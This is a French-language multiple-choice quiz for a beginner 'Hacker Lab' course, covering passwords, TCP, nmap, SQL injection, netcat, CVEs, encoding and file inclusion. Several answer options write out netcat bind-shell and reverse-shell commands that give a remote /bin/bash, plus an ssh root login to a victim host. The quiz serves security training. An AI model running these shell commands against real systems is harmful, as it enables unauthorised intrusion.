Hacker Lab

Evaluation des acquis

1 / 28 - Password
1

Lequel de ces mots de passe est le plus sécurisé

ada
G6*!9
lelundi31jaiaquaponey
Robert56$
2 / 28 - Bruteforce
1

Quels outils utilisent des méthodes de bruteforce

john
hydra
ping
nginx
3 / 28 - TCP
1

Le message SYN-ACK

Est le second message du 3-way handshake de TCP
Est la réponse du serveur TCP à un SYN
Est la réponse à un ACK
4 / 28 - TCP 2
1

Le sessage SYN contient seq: 100. Le message SYN-ACK va contenir

Seq:xxx Ack: 101
Seq:100 Ack:100
Seq: 101 Ack: 200
5 / 28 - Ping
1

Ping utilise ICMP qui est encapsulé dans :

TCP
UDP
IP
6 / 28 - Ping 2
1

Traceroute utilise ICMP et fait varier le champ:

ICMP Checksum
ICMP Code
IP TTL
ICMP Type
7 / 28 - Nmap
1

Je veux lire les bannières des serveurs:

nmap -sV bob.com
nmap -p- bob.com
nmap -sU -p 161 bob.com
8 / 28 - Nmap
1

Je veux détecter le service SNMP:

nmap -sV bob.com
nmap -p- bob.com
nmap -sU -p 161 bob.com
9 / 28 - Nmap
1

Je veux scanner tous les ports

nmap -sV bob.com
nmap -p- bob.com
nmap -sU -p 161 bob.com
10 / 28 - SQLi
1

Une SQLi est

Une injection de commandes SQL grace à des paramètres modifiables par l'utilisateur
Une injection de commandes Shell grace à des paramètres modifiables par l'utilisateur
due a une base de données non patchée
dangereux uniquement si la base de donnée a les droits root
11 / 28 - SQLi
1

Quel caractère utiliser pour détecter une SQLi ?

'
;
:
(
12 / 28 - SQLi
1

Quels mots de passe sont dans le top 10 de rockyou ?

123456
password
iloveyou
princess
robert
superman
13 / 28 - SQLi
1

Quel mot de passe a pour md5 8afa847f50a716e64932d995c8e7435a ?

123456
password
iloveyou
princess
robert
superman
14 / 28 - SQLi
1

A quoi sert l'option -i dans la commande ssh -i xxxxx root@victim.com ?

a bypasser le check de certificat
a utiliser une cef privée plutot qu'un mot de passe
a utiliser le protocole HTTPS
15 / 28 - SQLi
1

A quoi sert l'option HTTP Only dans un cookie ?

a ne pas utiliser HTTPS
a interdire l'accès à ce cookie en Javascript
a utiliser le protocole HTTPS
16 / 28 - Netcat
1

Je veux lancer un bind shell en écoute sur le port 4444

nc -lvp 4444
nc -e /bin/bash -lvp 4444
nc victim.com 4444
nc -e /bin/bash victim.com 4444
17 / 28 - Netcat
1

Je veux lancer un netcat en écoute sur le port 4444 et attendre un reverse shell

nc -lvp 4444
nc -e /bin/bash -lvp 4444
nc victim.com 4444
nc -e /bin/bash victim.com 4444
18 / 28 - Netcat
1

Je veux me connecter à un bind shell qui tourne sur victim.com

nc -lvp 4444
nc -e /bin/bash -lvp 4444
nc victim.com 4444
nc -e /bin/bash victim.com 4444
19 / 28 - Netcat
1

Je veux lancer un reverse shell vers ma kali qui est en écoute sur le port 4444

nc -lvp 4444
nc -e /bin/bash -lvp 4444
nc victim.com 4444
nc -e /bin/bash 10.10.2.22 4444
20 / 28 - CVE
1

CVE veut dire

Common Vulnerabilities and Exposures
Common Vuln and Exploits
Check Vulnerabilities and Exposures
21 / 28 - CVE 2
1

La CVE CVE-2014-6271 s'appelle

Shellshock
Dirty Cow
Drupalguedon
Spectre
22 / 28 - CVE 3
1

La CVE CVE-2014-6271 a été émise en

2014
2015
2013
2009
23 / 28 - Encodage
1

ZWRyZnlodWpvbA== est caractéristique de l'encodage

hexadecimal
unicode
base64
octal
24 / 28 - Encodage
1

ZWRyZnlodWpvbA== se décode

edyhedrfi
sxdcvfderf
olpmujgbh
edrfyhujol
25 / 28 - Find
1

find / -name flag*.txt 2>/dev/null

affiche flag_admin.txt s'il est lisible
affiche /root/root.txt s'il est lisible
n'affiche pas les messages d'erreurs
affiche tous les fichiers lisibles à partir de la racine
affiche /home/robert/flag_easy.txt s'il est lisible
26 / 28 - Su
1

su

permet de changer de compte si on connait le mote de passe
permet d'exploiter un sticky bit
n'est pas exploitable directement à partir de netcat. Il nécessite une manip en python pour obtenir un tty.
permet de se connecter à distance
27 / 28 - LFI
1

Une LFI

est une Local File Inclusion
permet de lire voire executer un fichier arbitraire du serveur
Fonctionne tres bien avec de l'upload de fichier
nécessite une base de donnée
28 / 28 - LFI
1

Je veux lancer un serveur web local pour transférer un fichier

python -m SimpleHTTPServer
nc -lvp 80
php -S localhost:8000 -t foo/
je lance apache dans un docker en mountant le répertoire local